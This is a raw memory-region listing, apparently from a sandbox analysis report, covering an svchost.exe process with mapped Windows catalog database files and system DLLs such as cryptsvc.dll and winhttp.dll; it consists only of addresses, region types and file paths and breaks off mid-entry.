Region: id = 4421 start_va = 0x3b52360000 end_va = 0x3b52421fff entry_point = 0x0 region_type = private name = "private_0x0000003b52360000" filename = "" Region: id = 4422 start_va = 0x3b52430000 end_va = 0x3b52430fff entry_point = 0x0 region_type = private name = "private_0x0000003b52430000" filename = "" Region: id = 4423 start_va = 0x3b52440000 end_va = 0x3b52440fff entry_point = 0x0 region_type = private name = "private_0x0000003b52440000" filename = "" Region: id = 4424 start_va = 0x3b52450000 end_va = 0x3b52450fff entry_point = 0x0 region_type = private name = "private_0x0000003b52450000" filename = "" Region: id = 4425 start_va = 0x3b52560000 end_va = 0x3b5265ffff entry_point = 0x0 region_type = private name = "private_0x0000003b52560000" filename = "" Region: id = 4426 start_va = 0x3b52660000 end_va = 0x3b5266ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b52660000" filename = "" Region: id = 4427 start_va = 0x3b52670000 end_va = 0x3b5267ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b52670000" filename = "" Region: id = 4428 start_va = 0x3b52680000 end_va = 0x3b5268ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b52680000" filename = "" Region: id = 4429 start_va = 0x3b52690000 end_va = 0x3b5269ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b52690000" filename = "" Region: id = 4430 start_va = 0x3b526a0000 end_va = 0x3b526affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b526a0000" filename = "" Region: id = 4431 start_va = 0x3b526b0000 end_va = 0x3b526bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b526b0000" filename = "" Region: id = 4432 start_va = 0x3b526c0000 end_va = 0x3b526c6fff entry_point = 0x0 region_type = private name = "private_0x0000003b526c0000" filename = "" Region: id = 4433 start_va = 0x3b526d0000 end_va = 0x3b526d0fff entry_point = 0x0 region_type = private name = "private_0x0000003b526d0000" filename = "" Region: id = 4434 start_va = 0x3b526e0000 end_va = 0x3b526e0fff entry_point = 0x0 region_type = private name = "private_0x0000003b526e0000" filename = "" Region: id = 4435 start_va = 0x3b526f0000 end_va = 0x3b526f3fff entry_point = 0x0 region_type = private name = "private_0x0000003b526f0000" filename = "" Region: id = 4436 start_va = 0x3b52700000 end_va = 0x3b52706fff entry_point = 0x0 region_type = private name = "private_0x0000003b52700000" filename = "" Region: id = 4437 start_va = 0x3b52710000 end_va = 0x3b5278ffff entry_point = 0x0 region_type = private name = "private_0x0000003b52710000" filename = "" Region: id = 4438 start_va = 0x3b52790000 end_va = 0x3b5279ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b52790000" filename = "" Region: id = 4439 start_va = 0x3b527a0000 end_va = 0x3b527affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b527a0000" filename = "" Region: id = 4440 start_va = 0x3b527b0000 end_va = 0x3b527bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b527b0000" filename = "" Region: id = 4441 start_va = 0x3b527c0000 end_va = 0x3b527cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b527c0000" filename = "" Region: id = 4442 start_va = 0x3b527d0000 end_va = 0x3b527dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b527d0000" filename = "" Region: id = 4443 start_va = 0x3b527e0000 end_va = 0x3b527effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b527e0000" filename = "" Region: id = 4444 start_va = 0x3b527f0000 end_va = 0x3b527f1fff entry_point = 0x0 region_type = private name = "private_0x0000003b527f0000" filename = "" Region: id = 4445 start_va = 0x3b52800000 end_va = 0x3b528fffff entry_point = 0x0 region_type = private name = "private_0x0000003b52800000" filename = "" Region: id = 4446 start_va = 0x3b52900000 end_va = 0x3b529fffff entry_point = 0x0 region_type = private name = "private_0x0000003b52900000" filename = "" Region: id = 4447 start_va = 0x3b52a00000 end_va = 0x3b52afffff entry_point = 0x0 region_type = private name = "private_0x0000003b52a00000" filename = "" Region: id = 4448 start_va = 0x3b52b00000 end_va = 0x3b52b00fff entry_point = 0x0 region_type = private name = "private_0x0000003b52b00000" filename = "" Region: id = 4449 start_va = 0x3b52b10000 end_va = 0x3b52b10fff entry_point = 0x0 region_type = private name = "private_0x0000003b52b10000" filename = "" Region: id = 4450 start_va = 0x3b52b20000 end_va = 0x3b52b2ffff entry_point = 0x3b52b20000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4451 start_va = 0x3b52b30000 end_va = 0x3b52b3ffff entry_point = 0x3b52b30000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4452 start_va = 0x3b52b40000 end_va = 0x3b52b4ffff entry_point = 0x3b52b40000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4453 start_va = 0x3b52b50000 end_va = 0x3b52b5ffff entry_point = 0x3b52b50000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4454 start_va = 0x3b52b60000 end_va = 0x3b52b6ffff entry_point = 0x3b52b60000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4455 start_va = 0x3b52b70000 end_va = 0x3b52b7ffff entry_point = 0x3b52b70000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4456 start_va = 0x3b52b80000 end_va = 0x3b52b8ffff entry_point = 0x3b52b80000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4457 start_va = 0x3b52b90000 end_va = 0x3b52b96fff entry_point = 0x0 region_type = private name = "private_0x0000003b52b90000" filename = "" Region: id = 4458 start_va = 0x3b52ba0000 end_va = 0x3b52baffff entry_point = 0x3b52ba0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4459 start_va = 0x3b52bb0000 end_va = 0x3b52bbffff entry_point = 0x3b52bb0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4460 start_va = 0x3b52bc0000 end_va = 0x3b52bcffff entry_point = 0x3b52bc0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4461 start_va = 0x3b52bd0000 end_va = 0x3b52bdffff entry_point = 0x3b52bd0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4462 start_va = 0x3b52be0000 end_va = 0x3b52beffff entry_point = 0x3b52be0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4463 start_va = 0x3b52bf0000 end_va = 0x3b52bfffff entry_point = 0x3b52bf0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4464 start_va = 0x3b52c00000 end_va = 0x3b52cfffff entry_point = 0x0 region_type = private name = "private_0x0000003b52c00000" filename = "" Region: id = 4465 start_va = 0x3b52d00000 end_va = 0x3b52dfffff entry_point = 0x0 region_type = private name = "private_0x0000003b52d00000" filename = "" Region: id = 4466 start_va = 0x3b52e00000 end_va = 0x3b52efffff entry_point = 0x0 region_type = private name = "private_0x0000003b52e00000" filename = "" Region: id = 4467 start_va = 0x3b52f00000 end_va = 0x3b52ffffff entry_point = 0x0 region_type = private name = "private_0x0000003b52f00000" filename = "" Region: id = 4468 start_va = 0x3b53000000 end_va = 0x3b530fffff entry_point = 0x0 region_type = private name = "private_0x0000003b53000000" filename = "" Region: id = 4469 start_va = 0x3b53100000 end_va = 0x3b531fffff entry_point = 0x0 region_type = private name = "private_0x0000003b53100000" filename = "" Region: id = 4470 start_va = 0x3b53200000 end_va = 0x3b532fffff entry_point = 0x0 region_type = private name = "private_0x0000003b53200000" filename = "" Region: id = 4471 start_va = 0x3b53300000 end_va = 0x3b5330ffff entry_point = 0x3b53300000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4472 start_va = 0x3b53310000 end_va = 0x3b5331ffff entry_point = 0x3b53310000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4473 start_va = 0x3b53320000 end_va = 0x3b5332ffff entry_point = 0x3b53320000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4474 start_va = 0x3b53330000 end_va = 0x3b53330fff entry_point = 0x0 region_type = private name = "private_0x0000003b53330000" filename = "" Region: id = 4475 start_va = 0x3b53340000 end_va = 0x3b5334ffff entry_point = 0x3b53340000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4476 start_va = 0x3b53350000 end_va = 0x3b5335ffff entry_point = 0x3b53350000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4477 start_va = 0x3b53360000 end_va = 0x3b53366fff entry_point = 0x0 region_type = private name = "private_0x0000003b53360000" filename = "" Region: id = 4478 start_va = 0x3b53370000 end_va = 0x3b533effff entry_point = 0x0 region_type = private name = "private_0x0000003b53370000" filename = "" Region: id = 4479 start_va = 0x3b533f0000 end_va = 0x3b533fffff entry_point = 0x3b533f0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4480 start_va = 0x3b53400000 end_va = 0x3b534fffff entry_point = 0x0 region_type = private name = "private_0x0000003b53400000" filename = "" Region: id = 4481 start_va = 0x3b53600000 end_va = 0x3b536fffff entry_point = 0x0 region_type = private name = "private_0x0000003b53600000" filename = "" Region: id = 4482 start_va = 0x3b53700000 end_va = 0x3b537fffff entry_point = 0x0 region_type = private name = "private_0x0000003b53700000" filename = "" Region: id = 4483 start_va = 0x3b53800000 end_va = 0x3b538fffff entry_point = 0x0 region_type = private name = "private_0x0000003b53800000" filename = "" Region: id = 4484 start_va = 0x3b53900000 end_va = 0x3b539fffff entry_point = 0x0 region_type = private name = "private_0x0000003b53900000" filename = "" Region: id = 4485 start_va = 0x3b53a00000 end_va = 0x3b549fffff entry_point = 0x0 region_type = private name = "private_0x0000003b53a00000" filename = "" Region: id = 4486 start_va = 0x3b54a00000 end_va = 0x3b54c0ffff entry_point = 0x0 region_type = private name = "private_0x0000003b54a00000" filename = "" Region: id = 4487 start_va = 0x3b54c10000 end_va = 0x3b64c0ffff entry_point = 0x0 region_type = private name = "private_0x0000003b54c10000" filename = "" Region: id = 4488 start_va = 0x3b64c10000 end_va = 0x3b74c0ffff entry_point = 0x0 region_type = private name = "private_0x0000003b64c10000" filename = "" Region: id = 4489 start_va = 0x3b74c10000 end_va = 0x3b74c10fff entry_point = 0x0 region_type = private name = "private_0x0000003b74c10000" filename = "" Region: id = 4490 start_va = 0x3b74c20000 end_va = 0x3b74c2ffff entry_point = 0x3b74c20000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4491 start_va = 0x3b74c30000 end_va = 0x3b74c3ffff entry_point = 0x3b74c30000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4492 start_va = 0x3b74c40000 end_va = 0x3b74c4ffff entry_point = 0x3b74c40000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4493 start_va = 0x3b74c50000 end_va = 0x3b74c5ffff entry_point = 0x3b74c50000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4494 start_va = 0x3b74c60000 end_va = 0x3b74c6ffff entry_point = 0x3b74c60000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4495 start_va = 0x3b74c70000 end_va = 0x3b74c7ffff entry_point = 0x3b74c70000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4496 start_va = 0x3b74c80000 end_va = 0x3b74c8ffff entry_point = 0x3b74c80000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4497 start_va = 0x3b74c90000 end_va = 0x3b74c9ffff entry_point = 0x3b74c90000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4498 start_va = 0x3b74ca0000 end_va = 0x3b74caffff entry_point = 0x3b74ca0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4499 start_va = 0x3b74cb0000 end_va = 0x3b74cbffff entry_point = 0x3b74cb0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4500 start_va = 0x3b74cc0000 end_va = 0x3b74ccffff entry_point = 0x3b74cc0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4501 start_va = 0x3b74cd0000 end_va = 0x3b74cdffff entry_point = 0x3b74cd0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4502 start_va = 0x3b74ce0000 end_va = 0x3b74ceffff entry_point = 0x3b74ce0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4503 start_va = 0x3b74cf0000 end_va = 0x3b74cfffff entry_point = 0x3b74cf0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4504 start_va = 0x3b74d00000 end_va = 0x3b74d0ffff entry_point = 0x3b74d00000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4505 start_va = 0x3b74d10000 end_va = 0x3b74d1ffff entry_point = 0x3b74d10000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4506 start_va = 0x3b74d20000 end_va = 0x3b74d2ffff entry_point = 0x3b74d20000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4507 start_va = 0x3b74d30000 end_va = 0x3b74d3ffff entry_point = 0x3b74d30000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4508 start_va = 0x3b74d40000 end_va = 0x3b74d4ffff entry_point = 0x3b74d40000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4509 start_va = 0x3b74d50000 end_va = 0x3b74d5ffff entry_point = 0x3b74d50000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4510 start_va = 0x3b74d60000 end_va = 0x3b74d6ffff entry_point = 0x3b74d60000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4511 start_va = 0x3b74d70000 end_va = 0x3b74d7ffff entry_point = 0x3b74d70000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4512 start_va = 0x7df5ff6e0000 end_va = 0x7ff5ff6dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff6e0000" filename = "" Region: id = 4513 start_va = 0x7ff7871f8000 end_va = 0x7ff7871f9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7871f8000" filename = "" Region: id = 4514 start_va = 0x7ff7871fc000 end_va = 0x7ff7871fdfff entry_point = 0x0 region_type = private name = "private_0x00007ff7871fc000" filename = "" Region: id = 4515 start_va = 0x7ff787200000 end_va = 0x7ff787201fff entry_point = 0x0 region_type = private name = "private_0x00007ff787200000" filename = "" Region: id = 4516 start_va = 0x7ff787202000 end_va = 0x7ff787203fff entry_point = 0x0 region_type = private name = "private_0x00007ff787202000" filename = "" Region: id = 4517 start_va = 0x7ff787204000 end_va = 0x7ff787205fff entry_point = 0x0 region_type = private name = "private_0x00007ff787204000" filename = "" Region: id = 4518 start_va = 0x7ff787206000 end_va = 0x7ff787207fff entry_point = 0x0 region_type = private name = "private_0x00007ff787206000" filename = "" Region: id = 4519 start_va = 0x7ff787208000 end_va = 0x7ff787209fff entry_point = 0x0 region_type = private name = "private_0x00007ff787208000" filename = "" Region: id = 4520 start_va = 0x7ff78720a000 end_va = 0x7ff78720bfff entry_point = 0x0 region_type = private name = "private_0x00007ff78720a000" filename = "" Region: id = 4521 start_va = 0x7ff78720e000 end_va = 0x7ff78720ffff entry_point = 0x0 region_type = private name = "private_0x00007ff78720e000" filename = "" Region: id = 4522 start_va = 0x7ff787210000 end_va = 0x7ff787211fff entry_point = 0x0 region_type = private name = "private_0x00007ff787210000" filename = "" Region: id = 4523 start_va = 0x7ff787212000 end_va = 0x7ff787213fff entry_point = 0x0 region_type = private name = "private_0x00007ff787212000" filename = "" Region: id = 4524 start_va = 0x7ff787214000 end_va = 0x7ff787215fff entry_point = 0x0 region_type = private name = "private_0x00007ff787214000" filename = "" Region: id = 4525 start_va = 0x7ff787216000 end_va = 0x7ff787217fff entry_point = 0x0 region_type = private name = "private_0x00007ff787216000" filename = "" Region: id = 4526 start_va = 0x7ff78721a000 end_va = 0x7ff78721bfff entry_point = 0x0 region_type = private name = "private_0x00007ff78721a000" filename = "" Region: id = 4527 start_va = 0x7ff78721c000 end_va = 0x7ff78721dfff entry_point = 0x0 region_type = private name = "private_0x00007ff78721c000" filename = "" Region: id = 4528 start_va = 0x7ff78721e000 end_va = 0x7ff78721ffff entry_point = 0x0 region_type = private name = "private_0x00007ff78721e000" filename = "" Region: id = 4529 start_va = 0x7ff787220000 end_va = 0x7ff78731ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff787220000" filename = "" Region: id = 4530 start_va = 0x7ff787320000 end_va = 0x7ff787342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff787320000" filename = "" Region: id = 4531 start_va = 0x7ff787345000 end_va = 0x7ff787345fff entry_point = 0x0 region_type = private name = "private_0x00007ff787345000" filename = "" Region: id = 4532 start_va = 0x7ff787346000 end_va = 0x7ff787347fff entry_point = 0x0 region_type = private name = "private_0x00007ff787346000" filename = "" Region: id = 4533 start_va = 0x7ff787348000 end_va = 0x7ff787349fff entry_point = 0x0 region_type = private name = "private_0x00007ff787348000" filename = "" Region: id = 4534 start_va = 0x7ff78734a000 end_va = 0x7ff78734bfff entry_point = 0x0 region_type = private name = "private_0x00007ff78734a000" filename = "" Region: id = 4535 start_va = 0x7ff78734c000 end_va = 0x7ff78734dfff entry_point = 0x0 region_type = private name = "private_0x00007ff78734c000" filename = "" Region: id = 4536 start_va = 0x7ff78734e000 end_va = 0x7ff78734ffff entry_point = 0x0 region_type = private name = "private_0x00007ff78734e000" filename = "" Region: id = 4537 start_va = 0x7ff787ec0000 end_va = 0x7ff787eccfff entry_point = 0x7ff787ec0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 4538 start_va = 0x7ffaea0a0000 end_va = 0x7ffaea11ffff entry_point = 0x7ffaea0a0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 4539 start_va = 0x7ffaeb090000 end_va = 0x7ffaeb371fff entry_point = 0x7ffaeb090000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 4540 start_va = 0x7ffaeb690000 end_va = 0x7ffaeb6eefff entry_point = 0x7ffaeb690000 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 4541 start_va = 0x7ffaec320000 end_va = 0x7ffaec334fff entry_point = 0x7ffaec320000 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 4542 start_va = 0x7ffaec340000 end_va = 0x7ffaec39efff entry_point = 0x7ffaec340000 region_type = mapped_file name = "ncsi.dll" filename = "\\Windows\\System32\\ncsi.dll" (normalized: "c:\\windows\\system32\\ncsi.dll") Region: id = 4543 start_va = 0x7ffaec3a0000 end_va = 0x7ffaec3fffff entry_point = 0x7ffaec3a0000 region_type = mapped_file name = "nlasvc.dll" filename = "\\Windows\\System32\\nlasvc.dll" (normalized: "c:\\windows\\system32\\nlasvc.dll") Region: id = 4544 start_va = 0x7ffaec420000 end_va = 0x7ffaec437fff entry_point = 0x7ffaec420000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 4545 start_va = 0x7ffaec440000 end_va = 0x7ffaec5c2fff entry_point = 0x7ffaec440000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 4546 start_va = 0x7ffaef620000 end_va = 0x7ffaef6f5fff entry_point = 0x7ffaef620000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 4547 start_va = 0x7ffaef730000 end_va = 0x7ffaef753fff entry_point = 0x7ffaef730000 region_type = mapped_file name = "cryptcatsvc.dll" filename = "\\Windows\\System32\\cryptcatsvc.dll" (normalized: "c:\\windows\\system32\\cryptcatsvc.dll") Region: id = 4548 start_va = 0x7ffaef760000 end_va = 0x7ffaef772fff entry_point = 0x7ffaef760000 region_type = mapped_file name = "crypttpmeksvc.dll" filename = "\\Windows\\System32\\crypttpmeksvc.dll" (normalized: "c:\\windows\\system32\\crypttpmeksvc.dll") Region: id = 4549 start_va = 0x7ffaef780000 end_va = 0x7ffaef796fff entry_point = 0x7ffaef780000 region_type = mapped_file name = "cryptsvc.dll" filename = "\\Windows\\System32\\cryptsvc.dll" (normalized: "c:\\windows\\system32\\cryptsvc.dll") Region: id = 4550 start_va = 0x7ffaf0270000 end_va = 0x7ffaf02b8fff entry_point = 0x7ffaf0270000 region_type = mapped_file name = "wkssvc.dll" filename = "\\Windows\\System32\\wkssvc.dll" (normalized: "c:\\windows\\system32\\wkssvc.dll") Region: id = 4551 start_va = 0x7ffaf07f0000 end_va = 0x7ffaf0809fff entry_point = 0x7ffaf07f0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" 